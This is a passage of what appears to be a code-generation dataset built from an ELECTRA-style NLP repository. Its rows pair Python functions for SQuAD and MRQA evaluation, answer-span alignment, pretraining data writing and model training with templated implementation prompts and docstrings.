qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
# For unanswerable questions, only correct answer is empty string
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
# Take max over all gold answers
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores | null |
6,181 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
pred_na = na_probs[qid] > na_prob_thresh
if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores | null |
6,182 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
]) | null |
6,183 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
# i.e., if we can put a threshold after this point
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle') | null |
6,184 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf() | null |
6,185 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh | null |
6,186 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import json
import os
import six
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.qa import qa_metrics
from model import modeling
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_check_is_max_context` function. Write a Python function `def _check_is_max_context(doc_spans, cur_span_index, position)` to solve the following problem:
Check if this is the 'max context' doc span for the token.
Here is the function:
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index | Check if this is the 'max context' doc span for the token. |
6,187 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import json
import os
import six
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.qa import qa_metrics
from model import modeling
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_improve_answer_span` function. Write a Python function `def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text)` to solve the following problem:
Returns tokenized answer spans that better match the annotated answer.
Here is the function:
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return new_start, new_end
return input_start, input_end | Returns tokenized answer spans that better match the annotated answer. |
6,188 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import json
import os
import six
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.qa import qa_metrics
from model import modeling
from model import tokenization
from util import utils
def is_whitespace(c):
return c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F | null |
6,189 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import six
import configure_finetuning
from finetune import scorer
from finetune.qa import mrqa_official_eval
from finetune.qa import squad_official_eval
from finetune.qa import squad_official_eval_v1
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_get_best_indexes` function. Write a Python function `def _get_best_indexes(logits, n_best_size)` to solve the following problem:
Get the n-best logits from a list.
Here is the function:
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes | Get the n-best logits from a list. |
6,190 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import six
import configure_finetuning
from finetune import scorer
from finetune.qa import mrqa_official_eval
from finetune.qa import squad_official_eval
from finetune.qa import squad_official_eval_v1
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_compute_softmax` function. Write a Python function `def _compute_softmax(scores)` to solve the following problem:
Compute softmax probability over raw logits.
Here is the function:
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = np.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs | Compute softmax probability over raw logits. |
6,191 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import six
import configure_finetuning
from finetune import scorer
from finetune.qa import mrqa_official_eval
from finetune.qa import squad_official_eval
from finetune.qa import squad_official_eval_v1
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `get_final_text` function. Write a Python function `def get_final_text(config: configure_finetuning.FinetuningConfig, pred_text, orig_text)` to solve the following problem:
Project the tokenized prediction back to the original text.
Here is the function:
def get_final_text(config: configure_finetuning.FinetuningConfig, pred_text,
orig_text):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
# Therefore, we have to apply a semi-complicated alignment heruistic between
# `pred_text` and `orig_text` to get a character-to-charcter alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for i, c in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return ns_text, dict(ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=config.do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if config.debug:
utils.log(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if config.debug:
utils.log("Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text, tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if config.debug:
utils.log("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if config.debug:
utils.log("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text | Project the tokenized prediction back to the original text. |
6,192 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import string
import re
import json
import tensorflow.compat.v1 as tf
from collections import Counter
import configure_finetuning
def read_predictions(prediction_file):
with tf.io.gfile.GFile(prediction_file) as f:
predictions = json.load(f)
return predictions | null |
6,193 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import string
import re
import json
import tensorflow.compat.v1 as tf
from collections import Counter
import configure_finetuning
def read_answers(gold_file):
answers = {}
with tf.io.gfile.GFile(gold_file, 'r') as f:
for i, line in enumerate(f):
example = json.loads(line)
if i == 0 and 'header' in example:
continue
for qa in example['qas']:
answers[qa['qid']] = qa['answers']
return answers | null |
6,194 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import string
import re
import json
import tensorflow.compat.v1 as tf
from collections import Counter
import configure_finetuning
def f1_score(prediction, ground_truth):
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def exact_match_score(prediction, ground_truth):
return (normalize_answer(prediction) == normalize_answer(ground_truth))
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(score)
return max(scores_for_ground_truths)
def evaluate(answers, predictions, skip_no_answer=False):
f1 = exact_match = total = 0
for qid, ground_truths in answers.items():
if qid not in predictions:
if not skip_no_answer:
message = 'Unanswered question %s will receive score 0.' % qid
print(message)
total += 1
continue
total += 1
prediction = predictions[qid]
exact_match += metric_max_over_ground_truths(
exact_match_score, prediction, ground_truths)
f1 += metric_max_over_ground_truths(
f1_score, prediction, ground_truths)
exact_match = 100.0 * exact_match / total
f1 = 100.0 * f1 / total
return {'exact_match': exact_match, 'f1': f1} | null |
6,195 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
import string
import re
import json
import sys
import os
import collections
import tensorflow.compat.v1 as tf
import configure_finetuning
def f1_score(prediction, ground_truth):
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def exact_match_score(prediction, ground_truth):
return (normalize_answer(prediction) == normalize_answer(ground_truth))
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(score)
return max(scores_for_ground_truths)
def evaluate(dataset, predictions):
f1 = exact_match = total = 0
for article in dataset:
for paragraph in article['paragraphs']:
for qa in paragraph['qas']:
total += 1
if qa['id'] not in predictions:
message = 'Unanswered question ' + qa['id'] + \
' will receive score 0.'
print(message, file=sys.stderr)
continue
ground_truths = list(map(lambda x: x['text'], qa['answers']))
prediction = predictions[qa['id']]
exact_match += metric_max_over_ground_truths(
exact_match_score, prediction, ground_truths)
f1 += metric_max_over_ground_truths(
f1_score, prediction, ground_truths)
exact_match = 100.0 * exact_match / total
f1 = 100.0 * f1 / total
return {'exact_match': exact_match, 'f1': f1} | null |
6,196 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import csv
import os
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.classification import classification_metrics
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_truncate_seq_pair` function. Write a Python function `def _truncate_seq_pair(tokens_a, tokens_b, max_length)` to solve the following problem:
Truncates a sequence pair in place to the maximum length.
Here is the function:
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop() | Truncates a sequence pair in place to the maximum length. |
6,197 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import csv
import os
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.classification import classification_metrics
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `read_tsv` function. Write a Python function `def read_tsv(input_file, quotechar=None, max_lines=None)` to solve the following problem:
Reads a tab separated value file.
Here is the function:
def read_tsv(input_file, quotechar=None, max_lines=None):
"""Reads a tab separated value file."""
with tf.io.gfile.GFile(input_file, "r") as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for i, line in enumerate(reader):
if max_lines and i >= max_lines:
break
lines.append(line)
return lines | Reads a tab separated value file. |
6,198 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
import configure_finetuning
class FeatureSpec(object):
"""Defines a feature passed as input to the model."""
def __init__(self, name, shape, default_value_fn=None, is_int_feature=True):
self.name = name
self.shape = shape
self.default_value_fn = default_value_fn
self.is_int_feature = is_int_feature
def get_parsing_spec(self):
return tf.io.FixedLenFeature(
self.shape, tf.int64 if self.is_int_feature else tf.float32)
def get_default_values(self):
if self.default_value_fn:
return self.default_value_fn(self.shape)
else:
return np.zeros(
self.shape, np.int64 if self.is_int_feature else np.float32)
The provided code snippet includes necessary dependencies for implementing the `get_shared_feature_specs` function. Write a Python function `def get_shared_feature_specs(config: configure_finetuning.FinetuningConfig)` to solve the following problem:
Non-task-specific model inputs.
Here is the function:
def get_shared_feature_specs(config: configure_finetuning.FinetuningConfig):
"""Non-task-specific model inputs."""
return [
FeatureSpec("input_ids", [config.max_seq_length]),
FeatureSpec("input_mask", [config.max_seq_length]),
FeatureSpec("segment_ids", [config.max_seq_length]),
FeatureSpec("task_id", []),
] | Non-task-specific model inputs. |
6,199 | import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature | null |
6,200 | import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
class ExampleWriter(object):
"""Writes pre-training examples to disk."""
def __init__(self, job_id, vocab_file, output_dir, max_seq_length,
num_jobs, blanks_separate_docs, do_lower_case,
num_out_files=1000):
self._blanks_separate_docs = blanks_separate_docs
tokenizer = tokenization.FullTokenizer(
vocab_file=vocab_file,
do_lower_case=do_lower_case)
self._example_builder = ExampleBuilder(tokenizer, max_seq_length)
self._writers = []
for i in range(num_out_files):
if i % num_jobs == job_id:
output_fname = os.path.join(
output_dir, "pretrain_data.tfrecord-{:}-of-{:}".format(
i, num_out_files))
self._writers.append(tf.io.TFRecordWriter(output_fname))
self.n_written = 0
def write_examples(self, input_file):
"""Writes out examples from the provided input file."""
with tf.io.gfile.GFile(input_file) as f:
for line in f:
line = line.strip()
if line or self._blanks_separate_docs:
example = self._example_builder.add_line(line)
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
example = self._example_builder.add_line("")
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
def finish(self):
for writer in self._writers:
writer.close()
The provided code snippet includes necessary dependencies for implementing the `write_examples` function. Write a Python function `def write_examples(job_id, args)` to solve the following problem:
A single process creating and writing out pre-processed examples.
Here is the function:
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = ExampleWriter(
job_id=job_id,
vocab_file=args.vocab_file,
output_dir=args.output_dir,
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=args.blanks_separate_docs,
do_lower_case=args.do_lower_case
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(args.corpus_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
example_writer.write_examples(os.path.join(args.corpus_dir, fname))
example_writer.finish()
log("Done!") | A single process creating and writing out pre-processed examples. |
6,201 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import optimization
from pretrain import pretrain_data
from pretrain import pretrain_helpers
from util import training_utils
from util import utils
The provided code snippet includes necessary dependencies for implementing the `get_generator_config` function. Write a Python function `def get_generator_config(config: configure_pretraining.PretrainingConfig, bert_config: modeling.BertConfig)` to solve the following problem:
Get model config for the generator network.
Here is the function:
def get_generator_config(config: configure_pretraining.PretrainingConfig,
bert_config: modeling.BertConfig):
"""Get model config for the generator network."""
gen_config = modeling.BertConfig.from_dict(bert_config.to_dict())
gen_config.hidden_size = int(round(
bert_config.hidden_size * config.generator_hidden_size))
gen_config.num_hidden_layers = int(round(
bert_config.num_hidden_layers * config.generator_layers))
gen_config.intermediate_size = 4 * gen_config.hidden_size
gen_config.num_attention_heads = max(1, gen_config.hidden_size // 64)
return gen_config | Get model config for the generator network. |
6,202 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import optimization
from pretrain import pretrain_data
from pretrain import pretrain_helpers
from util import training_utils
from util import utils
def model_fn_builder(config: configure_pretraining.PretrainingConfig):
"""Build the model for training."""
def model_fn(features, labels, mode, params):
"""Build the model for training."""
model = PretrainingModel(config, features,
mode == tf.estimator.ModeKeys.TRAIN)
utils.log("Model is built!")
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
model.total_loss, config.learning_rate, config.num_train_steps,
weight_decay_rate=config.weight_decay_rate,
use_tpu=config.use_tpu,
warmup_steps=config.num_warmup_steps,
lr_decay_power=config.lr_decay_power
)
output_spec = tf.estimator.tpu.TPUEstimatorSpec(
mode=mode,
loss=model.total_loss,
train_op=train_op,
training_hooks=[training_utils.ETAHook(
{} if config.use_tpu else dict(loss=model.total_loss),
config.num_train_steps, config.iterations_per_loop,
config.use_tpu)]
)
elif mode == tf.estimator.ModeKeys.EVAL:
output_spec = tf.estimator.tpu.TPUEstimatorSpec(
mode=mode,
loss=model.total_loss,
eval_metrics=model.eval_metrics,
evaluation_hooks=[training_utils.ETAHook(
{} if config.use_tpu else dict(loss=model.total_loss),
config.num_eval_steps, config.iterations_per_loop,
config.use_tpu, is_training=False)])
else:
raise ValueError("Only TRAIN and EVAL modes are supported")
return output_spec
return model_fn
The provided code snippet includes necessary dependencies for implementing the `train_or_eval` function. Write a Python function `def train_or_eval(config: configure_pretraining.PretrainingConfig)` to solve the following problem:
Run pre-training or evaluate the pre-trained model.
Here is the function:
def train_or_eval(config: configure_pretraining.PretrainingConfig):
"""Run pre-training or evaluate the pre-trained model."""
if config.do_train == config.do_eval:
raise ValueError("Exactly one of `do_train` or `do_eval` must be True.")
if config.debug:
utils.rmkdir(config.model_dir)
utils.heading("Config:")
utils.log_config(config)
is_per_host = tf.estimator.tpu.InputPipelineConfig.PER_HOST_V2
tpu_cluster_resolver = None
if config.use_tpu and config.tpu_name:
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
config.tpu_name, zone=config.tpu_zone, project=config.gcp_project)
tpu_config = tf.estimator.tpu.TPUConfig(
iterations_per_loop=config.iterations_per_loop,
num_shards=(config.num_tpu_cores if config.do_train else
config.num_tpu_cores),
tpu_job_name=config.tpu_job_name,
per_host_input_for_training=is_per_host)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=config.model_dir,
save_checkpoints_steps=config.save_checkpoints_steps,
tpu_config=tpu_config)
model_fn = model_fn_builder(config=config)
estimator = tf.estimator.tpu.TPUEstimator(
use_tpu=config.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=config.train_batch_size,
eval_batch_size=config.eval_batch_size)
if config.do_train:
utils.heading("Running training")
estimator.train(input_fn=pretrain_data.get_input_fn(config, True),
max_steps=config.num_train_steps)
if config.do_eval:
utils.heading("Running evaluation")
result = estimator.evaluate(
input_fn=pretrain_data.get_input_fn(config, False),
steps=config.num_eval_steps)
for key in sorted(result.keys()):
utils.log(" {:} = {:}".format(key, str(result[key])))
return result | Run pre-training or evaluate the pre-trained model. |
6,203 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import optimization
from pretrain import pretrain_data
from pretrain import pretrain_helpers
from util import training_utils
from util import utils
class PretrainingModel(object):
"""Transformer pre-training using the replaced-token-detection task."""
def __init__(self, config: configure_pretraining.PretrainingConfig,
features, is_training):
# Set up model config
self._config = config
self._bert_config = training_utils.get_bert_config(config)
if config.debug:
self._bert_config.num_hidden_layers = 3
self._bert_config.hidden_size = 144
self._bert_config.intermediate_size = 144 * 4
self._bert_config.num_attention_heads = 4
# Mask the input
masked_inputs = pretrain_helpers.mask(
config, pretrain_data.features_to_inputs(features), config.mask_prob)
# Generator
embedding_size = (
self._bert_config.hidden_size if config.embedding_size is None else
config.embedding_size)
if config.uniform_generator:
mlm_output = self._get_masked_lm_output(masked_inputs, None)
elif config.electra_objective and config.untied_generator:
generator = self._build_transformer(
masked_inputs, is_training,
bert_config=get_generator_config(config, self._bert_config),
embedding_size=(None if config.untied_generator_embeddings
else embedding_size),
untied_embeddings=config.untied_generator_embeddings,
name="generator")
mlm_output = self._get_masked_lm_output(masked_inputs, generator)
else:
generator = self._build_transformer(
masked_inputs, is_training, embedding_size=embedding_size)
mlm_output = self._get_masked_lm_output(masked_inputs, generator)
fake_data = self._get_fake_data(masked_inputs, mlm_output.logits)
self.mlm_output = mlm_output
self.total_loss = config.gen_weight * mlm_output.loss
# Discriminator
disc_output = None
if config.electra_objective:
discriminator = self._build_transformer(
fake_data.inputs, is_training, reuse=not config.untied_generator,
embedding_size=embedding_size)
disc_output = self._get_discriminator_output(
fake_data.inputs, discriminator, fake_data.is_fake_tokens)
self.total_loss += config.disc_weight * disc_output.loss
# Evaluation
eval_fn_inputs = {
"input_ids": masked_inputs.input_ids,
"masked_lm_preds": mlm_output.preds,
"mlm_loss": mlm_output.per_example_loss,
"masked_lm_ids": masked_inputs.masked_lm_ids,
"masked_lm_weights": masked_inputs.masked_lm_weights,
"input_mask": masked_inputs.input_mask
}
if config.electra_objective:
eval_fn_inputs.update({
"disc_loss": disc_output.per_example_loss,
"disc_labels": disc_output.labels,
"disc_probs": disc_output.probs,
"disc_preds": disc_output.preds,
"sampled_tokids": tf.argmax(fake_data.sampled_tokens, -1,
output_type=tf.int32)
})
eval_fn_keys = eval_fn_inputs.keys()
eval_fn_values = [eval_fn_inputs[k] for k in eval_fn_keys]
def metric_fn(*args):
"""Computes the loss and accuracy of the model."""
d = {k: arg for k, arg in zip(eval_fn_keys, args)}
metrics = dict()
metrics["masked_lm_accuracy"] = tf.metrics.accuracy(
labels=tf.reshape(d["masked_lm_ids"], [-1]),
predictions=tf.reshape(d["masked_lm_preds"], [-1]),
weights=tf.reshape(d["masked_lm_weights"], [-1]))
metrics["masked_lm_loss"] = tf.metrics.mean(
values=tf.reshape(d["mlm_loss"], [-1]),
